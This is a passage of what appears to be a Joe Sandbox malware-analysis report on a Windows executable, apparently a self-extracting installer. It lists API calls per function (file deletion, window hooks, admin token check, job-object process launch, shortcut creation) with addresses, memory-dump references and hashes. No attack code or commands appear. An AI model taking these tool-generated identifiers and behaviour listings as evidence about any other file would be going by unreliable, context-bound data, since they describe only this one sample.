                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1862581289-0
                                                                                                                                        • Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                        • Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
                                                                                                                                        • Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                        • Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408DDA
                                                                                                                                        • SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408DF4
                                                                                                                                        • SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00408E25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentHookThreadWindows$Dialog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1967849563-0
                                                                                                                                        • Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                        • Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
                                                                                                                                        • Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                        • Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69
                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
                                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
                                                                                                                                        • FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                        • Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                        • Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
                                                                                                                                        • Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                        • Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 70cc6543f89a80714e3e390a279f58e7cec3ea9652c2d41397cab368ec3e5f33
                                                                                                                                        • Instruction ID: c7f49ce94350c58bf9a178907c982dec7311dfba9986166f982fc986de3302c0
                                                                                                                                        • Opcode Fuzzy Hash: 70cc6543f89a80714e3e390a279f58e7cec3ea9652c2d41397cab368ec3e5f33
                                                                                                                                        • Instruction Fuzzy Hash: E361B671A147019BC728DF78C4A16EBF7E0BF40308F440A2FD58A9BA81D739B549C795
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: SetEnvironment
                                                                                                                                        • API String ID: 0-360490078
                                                                                                                                        • Opcode ID: c7bfdb3e15d592c1de232d933842c4ab9efd31f480a5751ca1ce541d06df7cb1
                                                                                                                                        • Instruction ID: a70ae2ba77342e2fa0442e9f712db7fa661bebf9b46ff7160e2a4c09fbd55f3e
                                                                                                                                        • Opcode Fuzzy Hash: c7bfdb3e15d592c1de232d933842c4ab9efd31f480a5751ca1ce541d06df7cb1
                                                                                                                                        • Instruction Fuzzy Hash: AF71126610DBD08FC3228B3D9C95265BFE1AEA3105B4D8ACDC0E64BB93D426E10CDB75
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: A
                                                                                                                                        • API String ID: 0-2078354741
                                                                                                                                        • Opcode ID: cab503b8d0af9376babe026cf16f77c57ae0b2221e255354d54cb8a8048025ec
                                                                                                                                        • Instruction ID: 83c227925f6feaddc60b1c5dc2dd2bb0d1016e3deb83b34307da0ad7d07c5c6c
                                                                                                                                        • Opcode Fuzzy Hash: cab503b8d0af9376babe026cf16f77c57ae0b2221e255354d54cb8a8048025ec
                                                                                                                                        • Instruction Fuzzy Hash: B5615A725087118FC318DF49D48494AF3E1FFC8318F1A8A6DEA885B361D771E959CB86
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                                                                                        • Instruction ID: 8cec78a6a68e099a16e582f3a8e71d5628037794c160d545261e982a803351c6
                                                                                                                                        • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                                                                                        • Instruction Fuzzy Hash: 02022E72A042118BD71CCE28C59027DBBE2FBC4344F150A3FE89667BD4D6789958CB9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3dfa02b277370bfe2ec98d47c5a79ead9a97245a421863a61a189d28b752ac7c
                                                                                                                                        • Instruction ID: 00da42485b8df296a223d8a4bb0704d2d4beee18af5583a36affb2337f9ab949
                                                                                                                                        • Opcode Fuzzy Hash: 3dfa02b277370bfe2ec98d47c5a79ead9a97245a421863a61a189d28b752ac7c
                                                                                                                                        • Instruction Fuzzy Hash: 50D183368882628FE308CF1ADC44566B7A2BFCD350F4E8A79DD9527652C334B913CB95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 91de5e9ca90c5c66c09e0000d0865218a8ccaff647e0888f7f8b7f535350ac81
                                                                                                                                        • Instruction ID: 5ec5f7016d4c94f6aa32e55c68bec760aaf54e75b98fe93e418b11edeadc38de
                                                                                                                                        • Opcode Fuzzy Hash: 91de5e9ca90c5c66c09e0000d0865218a8ccaff647e0888f7f8b7f535350ac81
                                                                                                                                        • Instruction Fuzzy Hash: 95D1A43A9082A28FE758CF19D850126B7E2AFC9350F8E457DD98427653C334F912DBD9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 692e8d5a784aa824240187812a4086a9ace9186d529d49d216be83ef82546555
                                                                                                                                        • Instruction ID: e08defff148b5926bcd092bf2a3d3211465a78a42eddcaea689309228d3a1ec9
                                                                                                                                        • Opcode Fuzzy Hash: 692e8d5a784aa824240187812a4086a9ace9186d529d49d216be83ef82546555
                                                                                                                                        • Instruction Fuzzy Hash: BD41F231B506250AF30C8FA99CD41962FC3E7CA3D2788C63DCA65C6299DABDC057D26C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0fe830799879132e88faa9bdf83c895a4da26f2b58621200bb7b6a207094dda4
                                                                                                                                        • Instruction ID: eb176d849e67670fb013f548a384bfff0e8aae9c15968500794edb79f18e410b
                                                                                                                                        • Opcode Fuzzy Hash: 0fe830799879132e88faa9bdf83c895a4da26f2b58621200bb7b6a207094dda4
                                                                                                                                        • Instruction Fuzzy Hash: 5341F131B506250AE31C8FA98CD41963BD3E7C93D2B88C63CCA65C6299DABDC057D258
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                                                                        • Instruction ID: f9960863feca845e0a2bb083c79b3a3513025fe6868613be1ab6860882a09a92
                                                                                                                                        • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                                                                        • Instruction Fuzzy Hash: C841A361814B9653EB124F7CC842262B320BFAB244F00D75AFDD179963FB326944A655
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d6961a6851b0df35e6703018b4a68322b5050cf4149273f733f52e21d87ed88d
                                                                                                                                        • Instruction ID: 2c4e62fec3df849f69a94679f1f46bc3cd0136aa7d98a83dd15acafa6a63b64e
                                                                                                                                        • Opcode Fuzzy Hash: d6961a6851b0df35e6703018b4a68322b5050cf4149273f733f52e21d87ed88d
                                                                                                                                        • Instruction Fuzzy Hash: 6F31E8B5F042620BF3118F1F8880165FBD29FD5210B8981BAD8A89B787D23ADC5287E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b803c9f07239feea0f262575304a291407bbcdaffd7af9557fce45a952fefe0a
                                                                                                                                        • Instruction ID: 23724df58c7f4124a6ae017cfa66e22fcdf8c0dadb3566f48448e1b23328b563
                                                                                                                                        • Opcode Fuzzy Hash: b803c9f07239feea0f262575304a291407bbcdaffd7af9557fce45a952fefe0a
                                                                                                                                        • Instruction Fuzzy Hash: A1211D3B360D4606EB0C8979AD377BE24C2E344306F88A53DD247C5785DEAE9895C60D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                                        • Instruction ID: 7846ea4dd02955097ce76b2bf4ea308812a0db0251b0987ea2224bd12e479c0c
                                                                                                                                        • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                                        • Instruction Fuzzy Hash: 3221F53290062587CB02CE6EE4945A7F3A1FBD436AF134627ED8467290C628EC54C6A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                                                                        • Instruction ID: 105f30e58fdbd480065e7f59d5795cdd8ec51099ca66f560f0d6eda42b15b9fd
                                                                                                                                        • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                                                                        • Instruction Fuzzy Hash: 3D21077252442587C701DF2DE4986B7B3E1FFD4329F638A3BD9928B2C0C628DC85D6A4
                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040556D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00405575
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040557D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00405585
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040558D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 00405595
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 0040559D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004055A5
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004055AD
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055B5
                                                                                                                                        • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040560A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405612
                                                                                                                                        • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
                                                                                                                                        • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
                                                                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
                                                                                                                                        • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
                                                                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
                                                                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                                                                        • String ID: " -$sfxwaitall
                                                                                                                                        • API String ID: 2734624574-3991362806
                                                                                                                                        • Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                        • Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
                                                                                                                                        • Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                        • Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69
                                                                                                                                        APIs
                                                                                                                                        • _wtol.MSVCRT ref: 00403B78
                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,0041EA00,00000000,0041E9F4), ref: 00403C1B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403C8C
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403C94
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403C9C
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403CA4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403CAC
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403CB4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403CBC
                                                                                                                                        • _wtol.MSVCRT ref: 00403D12
                                                                                                                                        • CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403E4B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403E53
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403E5B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403E63
